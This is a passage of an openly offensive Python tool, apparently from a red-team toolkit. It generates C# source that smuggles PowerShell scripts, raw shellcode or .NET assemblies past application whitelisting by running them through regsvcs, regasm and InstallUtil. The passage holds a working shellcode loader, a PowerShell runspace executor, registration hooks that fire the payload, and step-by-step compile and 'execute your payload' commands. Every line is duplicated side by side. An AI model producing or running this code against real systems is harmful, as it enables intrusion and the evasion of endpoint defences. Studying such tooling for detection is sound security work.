IntPtr hThread = IntPtr.Zero; IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0; UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF); WaitForSingleObject(hThread, 0xFFFFFFFF);
CloseHandle(hThread); CloseHandle(hThread);
VirtualFree(funcAddr, 0, MEM_RELEASE); VirtualFree(funcAddr, 0, MEM_RELEASE);
}''').safe_substitute( }''').safe_substitute(
payload2 = encodedPayload, payload2 = encodedPayload,
payloadSize = len(payload) payloadSize = len(payload)
) )
launchCode = shellcodeLoader launchCode = shellcodeLoader
else: else:
usings += ''' usings += '''
using System.Management.Automation; using System.Management.Automation;
using System.Management.Automation.Runspaces; using System.Management.Automation.Runspaces;
''' '''
powershellLaunchCode = string.Template(''' powershellLaunchCode = string.Template('''
public static void Execute() { public static void Execute() {
byte[] payload = System.Convert.FromBase64String("$payload2"); byte[] payload = System.Convert.FromBase64String("$payload2");
string decoded = System.Text.Encoding.UTF8.GetString(payload); string decoded = System.Text.Encoding.UTF8.GetString(payload);
Runspace runspace = RunspaceFactory.CreateRunspace(); Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open(); runspace.Open();
Pipeline pipeline = runspace.CreatePipeline(); Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded); pipeline.Commands.AddScript(decoded);
pipeline.Invoke(); pipeline.Invoke();
runspace.Close(); runspace.Close();
}''').safe_substitute( }''').safe_substitute(
payload2 = base64.b64encode(payload.encode()).decode() payload2 = base64.b64encode(payload.encode()).decode()
) )
launchCode = powershellLaunchCode launchCode = powershellLaunchCode
template = string.Template(''' template = string.Template('''
using System; using System;
using System.Diagnostics; using System.Diagnostics;
using System.Reflection; using System.Reflection;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
using System.EnterpriseServices; using System.EnterpriseServices;
$usings $usings
/* /*
Author: Casey Smith, Twitter: @subTee Author: Casey Smith, Twitter: @subTee
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com> Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
License: BSD 3-Clause License: BSD 3-Clause
Step 1: Create Your Strong Name Key -> key.snk Step 1: Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key) $Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte Set-Content key.snk -Value $Content -Encoding Byte
Step 2: Compile source code: Step 2: Compile source code:
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
Step 3: Execute your payload! Step 3: Execute your payload!
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
*/ */
namespace Program namespace Program
{ {
public class Bypass : ServicedComponent public class Bypass : ServicedComponent
{ {
public Bypass() public Bypass()
{ {
} }
// This executes if registration is successful // This executes if registration is successful
[ComRegisterFunction] [ComRegisterFunction]
public static void RegisterClass( string key ) public static void RegisterClass( string key )
{ {
Shellcode.Execute(); Shellcode.Execute();
} }
// This executes if registration fails // This executes if registration fails
[ComUnregisterFunction] [ComUnregisterFunction]
public static void UnRegisterClass( string key ) public static void UnRegisterClass( string key )
{ {
Shellcode.Execute(); Shellcode.Execute();
} }
} }
[System.ComponentModel.RunInstaller(true)] [System.ComponentModel.RunInstaller(true)]
public class ForInstallUtil : System.Configuration.Install.Installer public class ForInstallUtil : System.Configuration.Install.Installer
{ {
// This executes during InstallUtil /U invocation // This executes during InstallUtil /U invocation
public override void Uninstall(System.Collections.IDictionary savedState) public override void Uninstall(System.Collections.IDictionary savedState)
{ {
Shellcode.Execute(); Shellcode.Execute();
} }
} }
public class Shellcode public class Shellcode
{ {
$launchCode $launchCode
} }
}''').safe_substitute( }''').safe_substitute(
launchCode = launchCode, launchCode = launchCode,
usings = usings usings = usings
) )
return template return template
def detectFileIsExe(filePath, forced = False): def detectFileIsExe(filePath, forced = False):
first1000 = [] first1000 = []
with open(filePath, 'rb') as f: with open(filePath, 'rb') as f:
first1000 = f.read()[:1000] first1000 = f.read()[:1000]
if not (first1000[0] == 'M' and first1000[1] == 'Z'): if not (first1000[0] == 'M' and first1000[1] == 'Z'):
return False return False
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0] elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'): if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
return False return False
dosStub = "This program cannot be run in DOS mode." dosStub = "This program cannot be run in DOS mode."
printables = ''.join([x for x in first1000[0x40:] if x in string.printable]) printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
#if not dosStub in printables: #if not dosStub in printables:
# return False # return False
return True return True
def opts(argv): def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.') parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!') parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.') parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
args = parser.parse_args() args = parser.parse_args()
if args.exe and args.raw: if args.exe and args.raw:
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n') sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
sys.exit(-1) sys.exit(-1)
return args return args
def main(argv): def main(argv):
sys.stderr.write(''' sys.stderr.write('''
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz B. / mgeeky, <mb@binary-offensive.com>
''') ''')
if len(argv) < 2: if len(argv) < 2:
print('Usage: ./generateRogueDotNet.py <inputFile>') print('Usage: ./generateRogueDotNet.py <inputFile>')
sys.exit(-1) sys.exit(-1)
args = opts(argv) args = opts(argv)
_format = 'powershell' _format = 'powershell'
if args.exe: if args.exe:
if not detectFileIsExe(args.inputFile, args.exe): if not detectFileIsExe(args.inputFile, args.exe):
sys.stderr.write('[-] File not recognized as PE/EXE.\n\n') sys.stderr.write('[-] File not recognized as PE/EXE.\n\n')
return False return False
_format = 'exe' _format = 'exe'
sys.stderr.write('[+] File recognized as PE/EXE.\n\n') sys.stderr.write('[+] File recognized as PE/EXE.\n\n')
with open(args.inputFile, 'rb') as f: with open(args.inputFile, 'rb') as f:
payload = f.read() payload = f.read()
elif args.raw: elif args.raw:
_format = 'raw' _format = 'raw'
sys.stderr.write('[+] File specified as raw Shellcode.\n\n') sys.stderr.write('[+] File specified as raw Shellcode.\n\n')
with open(args.inputFile, 'rb') as f: with open(args.inputFile, 'rb') as f:
payload = f.read() payload = f.read()
else: else:
sys.stderr.write('[+] Powershell code given.\n') sys.stderr.write('[+] Powershell code given.\n')
if args.inputFile.endswith('.exe'): if args.inputFile.endswith('.exe'):
return False return False
payload = getCompressedPayload(args.inputFile) payload = getCompressedPayload(args.inputFile)
output = getSourceFileContents(payload, _format) output = getSourceFileContents(payload, _format)
print(output) print(output)
management = '' management = ''
if _format == 'powershell': if _format == 'powershell':
management = ' /r:System.Management.Automation.dll' management = ' /r:System.Management.Automation.dll'
commands = ''' commands = '''
===================================== =====================================
NEXT STEPS: NEXT STEPS:
Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory) Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory)
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key) $Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte Set-Content key.snk -Value $Content -Encoding Byte
Step 2: Compile source code: Step 2: Compile source code:
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs
Step 3: Execute your payload! Step 3: Execute your payload!
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
'''.format(management) '''.format(management)
if 'PROGRAMFILES(X86)' in os.environ: if 'PROGRAMFILES(X86)' in os.environ:
commands = commands.replace('Framework', 'Framework64') commands = commands.replace('Framework', 'Framework64')
sys.stderr.write(commands) sys.stderr.write(commands)
if __name__ == '__main__': if __name__ == '__main__':
main(sys.argv) main(sys.argv)